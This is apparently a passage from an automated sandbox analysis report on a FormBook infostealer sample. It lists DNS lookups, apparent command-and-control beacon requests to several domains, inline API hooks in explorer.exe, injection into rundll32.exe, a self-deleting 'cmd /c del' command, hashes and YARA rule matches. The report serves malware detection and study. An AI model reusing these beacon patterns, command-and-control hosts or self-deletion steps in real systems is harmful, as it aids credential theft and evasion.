                                                                                                                                                                Nov 3, 2023 12:38:11.666805029 CET1.1.1.1192.168.2.70x3f22No error (0)glocraze.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:38:32.072005987 CET1.1.1.1192.168.2.70xadebNo error (0)www.durufilmyapim.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:38:32.072005987 CET1.1.1.1192.168.2.70xadebNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 3, 2023 12:38:32.072005987 CET1.1.1.1192.168.2.70xadebNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                • www.gaming-chairs-vn-vi-2885437.fyi
                                                                                                                                                                • www.sklm888.com
                                                                                                                                                                • www.wokeeducationhateskids.com
                                                                                                                                                                • www.umertazkeer.com
                                                                                                                                                                • www.glocraze.com
                                                                                                                                                                • www.durufilmyapim.com
                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.749716104.17.158.180C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 3, 2023 12:36:28.890687943 CET115OUTGET /ju29/?M2Mp=6lX0R0Q&Bb_=jZmXybDTEhqhfjbWt8DWyZKNvc7QdVfFN8RblV5F5bs2BRUWluOZEJKJ+J3f2kZBRyfQB9gctA== HTTP/1.1
                                                                                                                                                                Host: www.gaming-chairs-vn-vi-2885437.fyi
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 3, 2023 12:36:28.985057116 CET116INHTTP/1.1 409 Conflict
                                                                                                                                                                Date: Fri, 03 Nov 2023 11:36:28 GMT
                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                Content-Length: 16
                                                                                                                                                                Connection: close
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 820451dcc9c27ff9-IAD
                                                                                                                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                                                                                                                                Data Ascii: error code: 1001


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.749717108.186.24.17580C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 3, 2023 12:36:49.663320065 CET117OUTGET /ju29/?Bb_=n8Crfq9d8L0uMe2mi2N2bIuprmrMns3qA2Eid6rDPq5MkWbkjsGFJF992xVz/9ETWq9TUrQEIA==&M2Mp=6lX0R0Q HTTP/1.1
                                                                                                                                                                Host: www.sklm888.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 3, 2023 12:36:49.836610079 CET118INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 03 Nov 2023 11:36:31 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 789
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e ce e4 d2 c4 c9 bd d7 d9 cb be b5 e7 d7 d3 bf c6 bc bc d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.74971875.2.115.19680C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 3, 2023 12:37:09.512099028 CET119OUTGET /ju29/?M2Mp=6lX0R0Q&Bb_=9Lm8jqPme8OjdFMw6eGY6bGRl079o6M7fF/LdPaGLMmXDMBCcOms1FNC+m6WNGhZ2iLvmxSXpQ== HTTP/1.1
                                                                                                                                                                Host: www.wokeeducationhateskids.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 3, 2023 12:37:09.932372093 CET120INHTTP/1.1 403 Forbidden
                                                                                                                                                                Date: Fri, 03 Nov 2023 11:37:09 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 146
                                                                                                                                                                Connection: close
                                                                                                                                                                Server: nginx
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                3192.168.2.749719103.224.212.21680C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 3, 2023 12:37:30.104631901 CET120OUTGET /ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q HTTP/1.1
                                                                                                                                                                Host: www.umertazkeer.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 3, 2023 12:37:30.272778988 CET121INHTTP/1.1 302 Found
                                                                                                                                                                date: Fri, 03 Nov 2023 11:37:30 GMT
                                                                                                                                                                server: Apache
                                                                                                                                                                set-cookie: __tad=1699011450.1255716; expires=Mon, 31-Oct-2033 11:37:30 GMT; Max-Age=315360000
                                                                                                                                                                location: http://ww25.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q&subid1=20231103-2237-3076-ba67-d1f6c141f914
                                                                                                                                                                content-length: 2
                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                connection: close
                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                4192.168.2.7497273.33.130.19080C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 3, 2023 12:38:11.760375023 CET169OUTGET /ju29/?Bb_=gDkZXs6+uubhkTTBwUg7wBT+4b2V8qQlIvdPiiNfmflrZ9ZAj1bLhBmsLpsiQ7EDnpvm500CUg==&M2Mp=6lX0R0Q HTTP/1.1
                                                                                                                                                                Host: www.glocraze.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 3, 2023 12:38:11.865736961 CET170INHTTP/1.1 403 Forbidden
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Fri, 03 Nov 2023 11:38:11 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 291
                                                                                                                                                                Connection: close
                                                                                                                                                                ETag: "65271109-123"
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                5192.168.2.74972934.149.87.4580C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 3, 2023 12:38:32.172303915 CET176OUTGET /ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA== HTTP/1.1
                                                                                                                                                                Host: www.durufilmyapim.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 3, 2023 12:38:32.290714979 CET177INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Date: Fri, 03 Nov 2023 11:38:32 GMT
                                                                                                                                                                X-Served-By: cache-iad-kiad7000120-IAD
                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                X-Seen-By: yvSunuo/8ld62ehjr5B7kA==
                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                Connection: close


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                                                                                GetMessageAINLINEexplorer.exe
                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE8
                                                                                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE8
                                                                                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE8
                                                                                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE8

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:12:34:30
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:420'368 bytes
                                                                                                                                                                MD5 hash:0C57A7AAE080FD2EAC42A31FA5B7F051
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:12:34:30
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\xheuzyg.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
                                                                                                                                                                Imagebase:0x1a0000
                                                                                                                                                                File size:245'248 bytes
                                                                                                                                                                MD5 hash:25D54D83B6D68CAF9DE7655FF5E33651
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:12:34:30
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:12:34:31
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\xheuzyg.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe
                                                                                                                                                                Imagebase:0x1a0000
                                                                                                                                                                File size:245'248 bytes
                                                                                                                                                                MD5 hash:25D54D83B6D68CAF9DE7655FF5E33651
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:12:34:32
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                Imagebase:0x7ff70ffd0000
                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:12:34:34
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Imagebase:0xde0000
                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:13
                                                                                                                                                                Start time:12:34:37
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:/c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:14
                                                                                                                                                                Start time:12:34:37
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:28
                                                                                                                                                                Start time:14:33:04
                                                                                                                                                                Start date:03/11/2023
                                                                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
                                                                                                                                                                Imagebase:0x7ff6b84d0000
                                                                                                                                                                File size:21'504 bytes
                                                                                                                                                                MD5 hash:7F4A25126DC7ABB0A94B1BC62587AF37
